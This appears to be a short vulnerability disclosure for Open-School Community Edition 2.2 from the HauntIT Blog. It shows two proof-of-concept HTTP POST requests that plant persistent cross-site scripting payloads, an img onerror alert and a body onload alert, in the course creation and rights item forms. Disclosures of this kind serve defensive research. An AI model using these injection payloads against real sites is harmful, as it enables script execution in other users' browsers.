# ==============================================================
# Title ...| Open-School Community Edition 2.2 
# Version .| osv2.2-CE.zip
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================

[+] From admin user:

# ==============================================================
# 1. Persistent XSS

---<request>---
POST /k/cms/osv/index.php?r=courses/courses/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 378

Courses%5Bcourse_name%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&Courses%5Bcode%5D=test&Courses%5Bsection_name%5D=test&Courses%5Bis_deleted%5D=0&Courses%5Bcreated_at%5D=2014-02-27&Courses%5Bupdated_at%5D=2014-02-27&Batches%5Bname%5D=test&Batches%5Bstart_date%5D=Feb+13.2014&Batches%5Bend_date%5D=Feb+28.2014&Batches%5Bis_active%5D=1&Batches%5Bis_deleted%5D=0&yt0=Save
---<request>---

# ==============================================================
# 2. Persistent XSS

---<request>---
POST /k/cms/osv/index.php?r=rights/authItem/create&type=0 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 161

AuthItemForm%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&AuthItemForm%5Bdescription%5D=sadasd&AuthItemForm%5BbizRule%5D=&AuthItemForm%5Bdata%5D=&yt0=Save
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/